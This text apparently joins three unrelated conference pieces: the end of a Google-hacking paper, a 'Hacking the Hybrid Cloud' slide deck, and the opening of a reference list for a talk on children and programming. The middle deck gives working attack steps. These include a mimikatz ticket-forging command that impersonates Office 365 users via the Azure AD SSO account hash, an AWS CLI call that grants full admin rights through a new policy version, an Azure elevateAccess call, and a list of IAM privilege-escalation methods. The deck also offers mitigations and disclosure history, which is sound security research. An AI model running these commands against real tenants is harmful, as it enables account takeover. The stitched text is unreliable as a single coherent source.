This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Googledork!
• Use the techniques outlined in this paper to check your own site for sensitive information or vulnerable files.
• Use gooscan (from http://johnny.ihackstuff.com) to scan your site for bad stuff, but first get advance express permission from Google! Without advance express permission, Google could come after you for violating their terms of service. The author is currently not aware of the exact implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to remove individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is certainly a
suggestion. The major search engines’ crawlers honor this file and its contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
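Whether a given crawler would be allowed to fetch a page can be checked from Python’s standard library. A minimal sketch (the example.com URLs are placeholders):

from urllib.robotparser import RobotFileParser

# Fetch and parse a site's robots.txt, then test whether a polite
# crawler may fetch a given path. Hackers can simply ignore the file.
rp = RobotFileParser("http://www.example.com/robots.txt")
rp.read()
print(rp.can_fetch("Googlebot", "http://www.example.com/admin/userlist/"))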
Thanks and shouts
First, I would like to thank God for taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah. Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security <www.gulftech.org>, Cesar <[email protected]>
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =)
Hacking the Hybrid Cloud
Sean Metcalf (@PyroTek3)
s e a n @ Trimarc Security . com
TrimarcSecurity.com
ABOUT
• Founder Trimarc (Trimarc.io), a professional services company that
helps organizations better secure their Microsoft platform, including
the Microsoft Cloud and VMWare Infrastructure.
• Microsoft Certified Master (MCM) Directory Services
• Microsoft MVP (2017, 2019, & 2020)
• Speaker: Black Hat, Blue Hat, BSides, DEF CON, DEF CON Cloud Village
Keynote, DerbyCon, Shakacon, Sp4rkCon
• Security Consultant / Researcher
• Active Directory Enthusiast - Own & Operate ADSecurity.org
(Microsoft platform security info)
AGENDA
• Hybrid Cloud
• The Cloud & Virtualization
• Compromising Domain Controllers (On-Prem)
• Cloud Hosted/Managed Active Directory
• Amazon AWS
• Microsoft Azure
• Google Cloud Platform (GCP)
• Attacking Hybrid Components
• Cloud Administration (IAM)
• Compromising On-Prem Domain Controllers Hosted in the Cloud –
AWS & Azure
• Conclusion
What is Hybrid Cloud?
• Blend of on-prem infrastructure combined with cloud services.
• Typically on-prem infrastructure with some cloud hosted infrastructure (IaaS) and services (SaaS).
• Connection points between on-prem and cloud often don’t focus on security.
Hybrid Cloud Scenarios
•On-Prem AD with Office 365 Services (SaaS)
• Office 365 to host mailboxes with authentication
performed by Active Directory on-prem.
•Cloud Datacenter
• Extending the datacenter to the cloud leveraging Azure
and/or Amazon AWS (IaaS).
•On-Prem AD with Cloud Hosted AD as Resource Forest
• Trust between on-prem AD and cloud hosted AD
•Combination of these (or other)
Sean Metcalf | @PyroTek3 | [email protected]
The Cloud &
Virtualization
Sean Metcalf | @PyroTek3 | [email protected]
Conceptually The Cloud is Virtualization (effectively)
• Cloud provider Infrastructure as a Service (IaaS) architecture
and configuration
• Amazon AWS architecture to host VMs (instances) which has
leveraged XEN and more recently (2018) Amazon’s Nitro
(based off KVM core kernel).
• Azure leverages a customized version of Hyper-V (core) to
host Azure VMs.
• Google Cloud Platform (GCP) uses KVM for virtualization.
• There is a cloud “fabric” that ties the “virtualization”
component with orchestration (and storage, network, etc).
Sean Metcalf | @PyroTek3 | [email protected]
https://docs.microsoft.com/en-us/azure/architecture/reference-architectures/n-tier/windows-vm
Sean Metcalf | @PyroTek3 | [email protected]
https://www.awsgeek.com/AWS-re-Invent-2018/Powering-Next-Gen-EC2-Instances-Deep-Dive-into-the-Nitro-System/
Sean Metcalf | @PyroTek3 | [email protected]
Access Office 365 with AWS Managed Microsoft AD
https://aws.amazon.com/blogs/security/how-to-enable-your-users-to-access-office-365-with-aws-microsoft-active-directory-credentials/
Sean Metcalf | @PyroTek3 | [email protected]
https://aws.amazon.com/blogs/apn/diving-deep-on-the-foundational-blocks-of-vmware-cloud-on-aws/
VMWare Cloud on AWS
Sean Metcalf | @PyroTek3 | [email protected]
Compromising On-Prem Domain Controllers
Sean Metcalf | @PyroTek3 | [email protected]
Physical DCs
• Physical Access
• Out of Band Management (HP ILO)
• Check for port 2381 on servers for ILO web service (on same
network –which is bad)
Sean Metcalf | @PyroTek3 | [email protected]
Test-NetConnection $IPAddress -Port 2381
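Building on the same cmdlet, a quick subnet sweep can look like the sketch below (the 10.0.0.0/24 range is a placeholder):

1..254 | ForEach-Object {
    $ip = "10.0.0.$_"
    # Probe the HP iLO web service port on each host in the range
    $r = Test-NetConnection -ComputerName $ip -Port 2381 -WarningAction SilentlyContinue
    if ($r.TcpTestSucceeded) { Write-Output "$ip exposes port 2381 (possible iLO)" }
}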
Airbus Security identified iLO security issues:
• A new exploitation technique that allows compromise of the
host server operating system through DMA.
• Leverage a discovered RCE to exploit an iLO4 feature which
allows read-write access to the host memory and inject a
payload in the host Linux kernel.
• New vulnerability in the web server to flash a new backdoored
firmware.
• The use of the DMA communication channel to execute
arbitrary commands on the host system.
• iLO (4/5) CHIF channel interface opens a new attack surface,
exposed to the host (even though iLO is set as disabled).
Exploitation of CVE-2018-7078 could allow flashing a
backdoored firmware from the host through this interface.
• We discovered a logic error (CVE-2018-7113) in the kernel
code responsible for the integrity verification of the userland
image, which can be exploited to break the chain-of-trust.
Related to new secure boot feature introduced with iLO5 and
HPE Gen10 server line.
• Provide a Go scanner to discover vulnerable servers running
iLO
https://github.com/airbus-seclab/ilo4_toolbox
Virtual DCs: VMWare
• Compromise VMWare administration
• Compromise account with VMWare access to Virtual DCs
• Compromise system running vCenter (Windows system or
appliance) since this is an administration gateway that
owns vSphere
• Identify VMWare ESXi Root account password and use to
compromise ESXi hosts
(similar to local Administrator account on Windows)
• Connect directly to virtual DCs with the VIX API
(via VMWare Tools)
Sean Metcalf | @PyroTek3 | [email protected]
Virtual DCs: Hyper-V
•Compromise members of “Hyper-V Admins” group.
•Compromise server hosting Hyper-V.
•Compromise local admin account on the Hyper-V
server (pw may be the same as other servers)
•Compromise account with GPO modify rights to the
OU containing Hyper-V servers.
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Hosted/Managed Active Directory
& What this Means to Pentesters & Red Teams
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Hosted/Managed AD
• AD environment spun up per customer by cloud provider
• 100% managed AD by the cloud provider
• Customer does not get Domain Admin rights or access to Domain
Controllers
• Amazon AWS, Microsoft Azure, and Google Cloud Platform all have a
host Managed AD environments for customers, with some differences
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
• 2 DCs running Windows Server 2012 R2 (172.31.14.175 &
172.31.22.253)
• Default domain Administrator account “Administrator” in the
“AWS Reserved” OU.
• First account is “Admin” and gains full rights on customer OU
• Customer OU created and rights delegated to AWS
Administrators (& default Admin account)
• The domain password policy is default, but the customer has the
ability to modify 5 pre-created Fine-grained password policies
• The DC auditing policy is decent except no Kerberos audit
policies, so no way to detect Kerberoasting (requires "Audit
Kerberos Service Ticket Operations" auditing).
Sean Metcalf | @PyroTek3 | [email protected]
AWS Managed AD – Customer Admin Account
Sean Metcalf | @PyroTek3 | [email protected]
AWS Microsoft AD Delegation Groups
• AWS Delegated Administrators group is delegated most rights including:
• Group Modify rights on the "AWS Delegated Groups" OU
• "Reanimate-Tombstones" (effectively the ability to undelete objects)
• AWS Delegated Managed Service Account Administrators group is
delegated rights to create and manage MSAs
• AWS Delegated Add Workstations To Domain Users added to the "Add
workstations to domain" URA on DC GPO
• AWS Delegated Kerberos Delegation Administrators added to "Enable
computer and user accounts to be trusted for delegation"
• AWS Delegated Replicate Directory Changes Administrators group is
delegated "DS-Replication-Get-Changes" at the domain level
• AWS Delegated Domain Name System Administrators is added to the
DNSAdmins group providing DNS administration.
• AWS Delegated Server Administrators group is added to the local
Administrators on all computers in the customer OU ("LAB") and child
OUs via the GPO "ServerAdmins".
Sean Metcalf | @PyroTek3 | [email protected]
Azure Active Directory Domain Services
Sean Metcalf | @PyroTek3 | [email protected]
Azure Active Directory Domain Services (Managed AD)
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD Directory Services (Managed AD)
• 2 DCs running Windows Server 2012 R2 (10.0.1.4 & 10.0.1.5)
• Default domain Administrator account “dcaasadmin” (default location)
• Initial admin account is Azure AD account – can select Azure AD accounts
(or synched on-prem AD accounts)
• Customer OUs: AADDC Computers & AADDC Users
• 1 Fine-Grained Password Policy (FGPP) called “AADDSSTFPSO”
• Authenticated Users can add computers to the domain
• Event auditing on Managed AD Domain Controllers not configured via
GPO, so can’t see configuration.
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD DS Delegation Groups
• AAD DC Administrators has the ability to create new OUs (domain)
• AAD DC Administrators is delegated Full Control on:
• AADDC Computers
• AADDSSyncEscrows
• AADDSSyncState
• Managed Service Accounts
• Program Data
• AAD DC Administrators has Edit Settings rights on the GPOs:
• AADDC Computers GPO (linked to OU=AADDC
Computers,DC=trimarcrd,DC=com)
• AADDC Users GPO (linked to OU=AADDC Users,DC=trimarcrd,DC=com)
• The GPO AADDC Computers GPO adds AAD DC Administrators to the
local group Administrators in the following OU AADDC Computers
• AAD DC Service Accounts has DS-Replication-Get-Changes rights
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed Service for Microsoft Active Directory (Managed Microsoft AD)
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed Microsoft AD
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed Microsoft AD
• 2 DCs running Windows Server 2019 Datacenter (2012R2 Forest FL)
• The AD Recycle Bin has not been enabled
• Default domain Administrator account “Administrator” (disabled)
• 2nd domain admin account “cloudsvcadmin”
• First account is customer created (“setupadmin” –can be changed)
• The domain password policy is default, but the customer has the
ability to create Fine-grained password policies
• Event auditing on Managed AD Domain Controllers not configured
via GPO, so can’t see configuration.
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed AD Delegation Groups
• Cloud Service All Administrators
• Delegated Full Control on all objects (& link GPO rights) in the Cloud OU
• Cloud Service Administrators
• Member of Cloud Service All Administrators & Group Policy Creator Owners
• Cloud Service Computer Administrators
• Added to local Administrators group via GPO on Cloud OU
• Cloud Service Managed Service Account Administrators
• Delegated Full Control on the Managed Service Accounts OU
• Cloud Service DNS Administrators
• Cloud Service Protected Users
• Cloud Service Group Policy Creator Owners
Sean Metcalf | @PyroTek3 | [email protected]
Managed AD Common Themes
• No customer Domain Admin or Domain Controller rights.
• Custom OU(s) are provided for customer use (users, computers, groups,
etc.).
• Delegation groups provides AD component management capability to
customer.
• Domain Password Policy is default (7 characters), with the ability to adjust
via Fine-Grained Password Policies.
• Azure AD DS & GCP Managed AD both seem to have default Domain
Controller GPO settings.
• All provide the ability to configure an AD trust, so you may see the on-prem
AD forest trust a Managed AD environment (in the near future).
• Slightly different (or quite different!) approaches are used to provide the
same or similar capability.
Sean Metcalf | @PyroTek3 | [email protected]
AD Security Review PowerShell Script: https://trimarc.co/ADCheckScript
Attacking Managed AD
• Determine which Managed AD you are viewing (combination of OU and
group names)
• Likely no escalation to Domain Admins, so focus on delegation groups &
membership
• Identify default customer admin account.
• Azure AD DS can be managed by Azure AD accounts that are synchronized
into Azure AD DS or even on-prem AD accounts synched in from the on-
prem Azure AD Connect (through Azure AD) to Azure AD DS. If Password
Hash Sync (PHS) is enabled, then the on-prem AD account hash is included.
• Enumerate Managed AD privileged group membership.
• Managed AD typically used & managed by Application Owners who may not
realize the rights they do have as members in the Managed AD delegation
groups.
• DC auditing may not be configured to detect malicious activity (or sent to
SIEM)
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Hybrid Cloud Components
Amazon AD Connector
https://aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector/
Sean Metcalf | @PyroTek3 | [email protected]
Microsoft Pass-Through Authentication (PTA)
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Microsoft PTA
•Managed by Azure AD Connect
•Compromise server hosting PTA (typically Azure AD
Connect server)
•Azure AD sends the clear-text password (not hashed!)
to authenticate the user.
•Inject DLL to compromise credentials used for PTA
https://blog.xpnsec.com/azuread-connect-for-redteam/
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD Seamless Single Sign-On
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Azure AD Seamless Single Sign-On
• Managed by Azure AD Connect
• “Azure AD exposes a publicly available endpoint that accepts
Kerberos tickets and translates them into SAML and JWT
tokens”
• Compromise the Azure AD Seamless SSO computer account password hash ("AZUREADSSOACC")
• Generate a Silver Ticket for the user you want to impersonate and the service 'aadg.windows.net.nsatc.net' (see the sketch below)
• Inject this ticket into the local Kerberos cache
• The Azure AD Seamless SSO computer account password doesn't change
https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
Sean Metcalf | @PyroTek3 | [email protected]
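The dsinternals write-up linked above performs the ticket forging with mimikatz; an illustrative invocation, where the domain, SID, user, RID, and the AZUREADSSOACC NT hash are all placeholders:

kerberos::golden /user:victimuser /id:1105 /domain:corp.example.com /sid:S-1-5-21-1111111111-2222222222-3333333333 /rc4:<AZUREADSSOACC NT hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt

With the forged ticket in the cache, a browser on that session can then authenticate to Azure AD as the impersonated user.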
Attacking Azure AD Connect
DEF CON 25
(July 2017)
On-Prem: Acme’s Azure AD Connect
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Administration
Identity Access Management (IAM)
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Administration & Roles
•Administrative groups are called Roles
•Each role has specifically delegated access.
•Depending on the cloud provider, custom roles can be
created with custom delegation and rights.
•Azure and Amazon AWS each have their own methods
for this, but the concepts are the same.
Sean Metcalf | @PyroTek3 | [email protected]
Azure IAM – Role Types
•Owner
• Has full access to all resources including the right to
delegate access to others.
•Contributor
• Can create and manage all types of Azure resources but
can't grant access to others.
•Reader
• Can view existing Azure resources.
Sean Metcalf | @PyroTek3 | [email protected]
Azure IAM – Privileged Roles
•Tenant Admins
• Owner Role on the Tenant
• Full control over the tenant and all subscriptions
•Subscription Admin
• Owner Role on the Subscription
• Full control over the subscription
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
AWS IAM (Organizations)
• Root Account (Payer Account) – organization primary account
(often the first account)
• Account Admins
• Full control over the Account and everything in the account (account
services)
• If Root Account (admin) AND Account Admin = Full organizational
control
• No real “subscription” concept
• Organizational Unit concept that provides granular
administration of instances (EC2)
Sean Metcalf | @PyroTek3 | [email protected]
AWS IAM Privilege Escalation Methods
• Creating a new policy version (iam:CreatePolicyVersion)
This privilege escalation method could allow a user to gain full administrator access of the AWS account (a CLI sketch follows this list).
• Creating an EC2 instance with an existing instance profile (iam:PassRole and ec2:RunInstances)
This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
• Creating a new user access key (iam:CreateAccessKey)
This method would give an attacker the same level of permissions as any user they were able to create an access key for, which could range from no privilege escalation to full administrator access to the account.
• Create/update new login profile (iam:CreateLoginProfile / iam:UpdateLoginProfile)
This method would give an attacker the same level of permissions as any user they were able to create a login profile for, which could range from no privilege escalation to full administrator access to the account.
• Attaching a policy to a user (iam:AttachUserPolicy)
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a user, giving them full administrator access to the AWS environment.
• Attaching a policy to a group (iam:AttachGroupPolicy)
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a group, giving them full administrator access to the AWS environment.
• Attaching a policy to a role (iam:AttachRolePolicy)
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a role, giving them full administrator access to the AWS environment.
• Creating/updating an inline policy for a user (iam:PutUserPolicy)
Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
• Creating/updating an inline policy for a group (iam:PutGroupPolicy)
Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
• Creating/updating an inline policy for a role (iam:PutRolePolicy)
Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
• Adding a user to a group (iam:AddUserToGroup)
The attacker would be able to gain privileges of any existing group in the account, which could range from no privilege escalation to full administrator access to the account.
• Updating the AssumeRolePolicyDocument of a role (iam:UpdateAssumeRolePolicy)
This would give the attacker the privileges that are attached to any role in the account, which could range from no privilege escalation to full administrator access to the account.
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
Sean Metcalf | @PyroTek3 | [email protected]
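To make the first method concrete, this is roughly what abusing iam:CreatePolicyVersion looks like with the AWS CLI; the account ID, policy name, and policy file are placeholders, and admin-policy.json would be a policy document allowing Action "*" on Resource "*":

aws iam create-policy-version \
    --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
    --policy-document file://admin-policy.json \
    --set-as-default

Because the new version is set as default, every principal the policy is attached to immediately gains the broadened permissions.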
Cloud API Keys
• Provide permanent access, often with privileged rights.
• Often provides additional authentication access method
(other than username/password)
• API keys are frequently exposed in code (Github), including
private repositories.
• Compromised API keys need to be regenerated.
Sean Metcalf | @PyroTek3 | [email protected]
Compromise Cloud Hosted DCs via AWS Federation
https://aws.amazon.com/blogs/security/aws-federated-authentication-with-active-directory-federation-services-ad-fs/
AWS Federated Authentication with Active
Directory Federation Services (AD FS)
Sean Metcalf | @PyroTek3 | [email protected]
[Diagram, built up across several slides: on-prem AD Domain Controllers are hosted in AWS EC2; members of the on-prem AD group "AWS EC2 Admins" federate into AWS and map to the IAM role "AWS EC2 Administration", which grants administration of the EC2 instances, including the hosted DCs.]
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem AD Account -> AWS Federation ->
Compromise On-Prem AD Summary
• On-prem AD Domain Controllers are hosted in AWS EC2
• On-prem AD groups are added to AWS Roles
• Compromise on-prem AD user account to compromise AWS EC2
instances (VMs) to run stuff on DCs
• Amazon SSM installed by default on most Amazon provided
instances (template) – need role to execute
• Hopefully you are logging this and looking at the logs (CloudTrail), and the logs can't be deleted.
Sean Metcalf | @PyroTek3 | [email protected]
From Azure AD to Azure
An Unanticipated Attack Path
Note that it’s possible that Microsoft has made changes to elements described in
this section since I performed this research and reported the issue.
https://adsecurity.org/?p=4277
Sean Metcalf | @PyroTek3 | [email protected]
Updated docs
Sean Metcalf | @PyroTek3 | [email protected]
Access Management for Azure Resources
Sean Metcalf | @PyroTek3 | [email protected]
https://docs.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin
Sean Metcalf | @PyroTek3 | [email protected]
Except…
Sean Metcalf | @PyroTek3 | [email protected]
Elevate Access API
Sean Metcalf | @PyroTek3 | [email protected]
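Behind the portal toggle sits the documented elevateAccess ARM endpoint; a minimal PowerShell sketch, assuming you already hold an ARM access token for the Global Admin account:

$token = "<ARM access token>"
# Calling elevateAccess adds the caller to User Access Administrator at root scope ("/")
Invoke-RestMethod -Method Post `
    -Uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" `
    -Headers @{ Authorization = "Bearer $token" }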
https://github.com/hausec/PowerZure
Sean Metcalf | @PyroTek3 | [email protected]
Compromise Office 365 Global Admin
Sean Metcalf | @PyroTek3 | [email protected]
(Office 365) Global Admin -> (Azure) User Access Administrator
Sean Metcalf | @PyroTek3 | [email protected]
Hacker Account Added to User Access Administrator
Sean Metcalf | @PyroTek3 | [email protected]
Azure RBAC Role Monitoring
Sean Metcalf | @PyroTek3 | [email protected]
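One way to watch this role with the Az PowerShell module (a sketch; requires rights to read role assignments at root scope, and output fields vary by module version):

Get-AzRoleAssignment -Scope "/" |
    Where-Object { $_.RoleDefinitionName -eq "User Access Administrator" } |
    Select-Object DisplayName, SignInName, ObjectType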
What About Removal?
Sean Metcalf | @PyroTek3 | [email protected]
Get Azure Owner Rights!
Sean Metcalf | @PyroTek3 | [email protected]
Virtual Machine Contributor
"… lets you manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to."
https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor
Sean Metcalf | @PyroTek3 | [email protected]
Microsoft.Compute/virtualMachines/runCommand/
Add Attacker Controlled Account to Virtual
Machine Contributor
Sean Metcalf | @PyroTek3 | [email protected]
(Office 365) Global Admin -> (Azure) User Access Administrator -> Add to Role -> (Azure) Subscription Admin
Sean Metcalf | @PyroTek3 | [email protected]
Separation of
Administration
• Companies often have 2 groups managing
different systems.
• One team typically manages Active
Directory & Azure AD.
• Another team typically manages servers
on-prem and in the cloud (IAAS).
• These teams expect that they have
exclusive control of their respective areas.
Sean Metcalf | @PyroTek3 | [email protected]
Why is this issue important?
• Customers usually have no expectation that an Office
365 Global Administrator has the ability to control
Azure role membership.
• Microsoft documented Global Administrator as an
“Office 365 Admin”, not as an Office 365 & potential
Azure administrator.
• Office 365 (Azure AD) Global Administrators can gain
Azure subscription role administration access by
toggling a single switch.
• Azure doesn’t have great granular control over who can
run commands on Azure VMs that are sensitive like
Azure hosted Domain Controllers.
• Once the “Access management for Azure resources” bit
is set, it stays set until the account that toggled the
setting to “Yes” later changes it to “No”.
• Removing the account from Global Administrators does
not remove the account from “User Access
Administrator” access either.
Sean Metcalf | @PyroTek3 | [email protected]
Detection Key Points
• Can’t detect this setting on Azure AD user accounts using PowerShell,
portal, or other method.
• No Office 365/Azure AD logging I can find that states that an Azure AD
account has set this bit (“Access management for Azure resources”).
• No (Azure AD/O365) Audit Logs logging that clearly identifies this change.
• Core Directory, DirectoryManagement “Set Company Information” Log
shows success for the tenant name and the account that performed it.
However, this only identifies that something changed relating to “Company
Information” – no detail logged other than “Set Company Information” and
in the event the Modified Properties section is empty stating “No modified
properties”.
• Didn’t find any default Azure logging after adding this account to the VM
Contributor role in Azure.
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD to Azure Mitigation
• Monitor the Azure AD role "Global Administrator" for membership changes.
• Enforce MFA on all accounts in the Global Administrator role.
• Control the Global Administrator role with Azure AD Privileged Identity Manager (PIM).
• Monitor the Azure RBAC role "User Access Administrator" for membership changes.
• Ensure sensitive systems like Domain Controllers in Azure are isolated and protected as much as possible. Ideally, use a separate tenant for sensitive systems.
Sean Metcalf | @PyroTek3 | [email protected]
MSRC Reporting Timeline
• Reported to Microsoft in September 2019.
• MSRC responds in early October 2019:
“Based on [internal] conversations this appears to be By Design and the documentation is being
updated. “
• Sent MSRC additional information in mid October 2019 after a day of testing detection and
potential logging.
• MSRC responds that “most of what you have is accurate”
• Sent MSRC update in late January 2020 letting them know that I would be submitting this as part
of a larger presentation to Black Hat USA & DEF CON (2020).
• MSRC acknowledges.
• Sent MSRC notification that I would be sharing this information in this blog.
• Documentation updated – June 2020.
• MSRC Security incident still open as of July 2020.
I was informed by Microsoft during my interactions with MSRC that they are looking into re-working this
functionality to resolve some of the shortcomings I identified.
Sean Metcalf | @PyroTek3 | [email protected]
How bad can this get?
Sean Metcalf | @PyroTek3 | [email protected]
How bad can this get?
Attacker takes control of Azure resources
Removes accounts from all Roles
Ransom the Azure environment
Azure Ransomware?
AzureWare?
Sean Metcalf | @PyroTek3 | [email protected]
Next Level
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
[Diagram, repeated across several slides: an on-prem datacenter with a federation server connected to Azure, AWS, and Google Cloud Platform (GCP); compromising the federation layer reaches every connected cloud.]
"Don't want all my eggs in one basket… So now eggs are in all baskets."
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf (@PyroTek3)
s e a n @ Trimarc Security . com
www.ADSecurity.org
TrimarcSecurity.com
Slides: Presentations.ADSecurity.org
Sean Metcalf | @PyroTek3 | [email protected]
• Given that cloud IAAS is similar to on-prem
virtualization, cloud attacks are similar as well
• Connection points between on-prem & cloud
need to be carefully considered.
• Domain Controllers can be vulnerable no
matter where they are located (on-prem & in
the cloud).
• Authentication flows between on-prem & cloud
(and Cloud to Cloud!) can be vulnerable.
• Protecting admin accounts is even more
important in a cloud-enabled world.
Recommendations
References
• GCP KVM reference: https://cloud.google.com/compute/docs/faq
• Airbus Security – iLO: https://github.com/airbus-seclab/ilo4_toolbox
• AWS Managed AD: https://docs.aws.amazon.com/directoryservice/latest/admin-guide/directory_microsoft_ad.html
• Azure AD Domain Services: https://azure.microsoft.com/en-us/services/active-directory-ds/
• GCP Managed AD: https://cloud.google.com/managed-microsoft-ad
• Amazon AD Connector: https://aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector/
• Microsoft PTA: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
• Attacking Microsoft PTA & Azure AD Connect: https://blog.xpnsec.com/azuread-connect-for-redteam/
• Azure AD Seamless SSO: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
• Attacking Azure AD Seamless SSO: https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
• Rhino Security Labs – AWS IAM Privilege Escalation Methods:
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/
https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
• From Azure AD to Azure: An Unanticipated Attack Path: https://adsecurity.org/?p=4277
• Introducing ROADtools – The Azure AD exploration framework: https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/
• Dirk-jan Mollema's talks: https://dirkjanm.io/talks/
Sean Metcalf | @PyroTek3 | [email protected]
The Six Year Old Hacker: References and resources:
Educational Theory, Piaget, Montessori, Papert and others:
http://education.indiana.edu/~p540/webcourse/develop.html
http://www.ship.edu/~cgboeree/piaget.html
http://www.montessori.edu/
http://www.montessori.org/
Stoll Lillard, Angeline; Montessori: The Science Behind the Genius (Oxford
University Press 2005)
http://www.papert.org/
Papert, Seymour; Mindstorms: Children, Computers, and Powerful Ideas,
(Basic Books 1999)
Papert, Seymour; Constructionism Research Reports and Essays, 1985-1990
(Greenwood Pub Group 1991)
Programming:
LOGO Foundation.
http://el.media.mit.edu/logo-foundation/
UCB LOGO, runs under several OSs. A good source for serious LOGO programming
texts.
http://www.cs.berkeley.edu/~bh/logo.html
Windows version of LOGO derived from UCB LOGO. Runs well under Wine. Good
links.
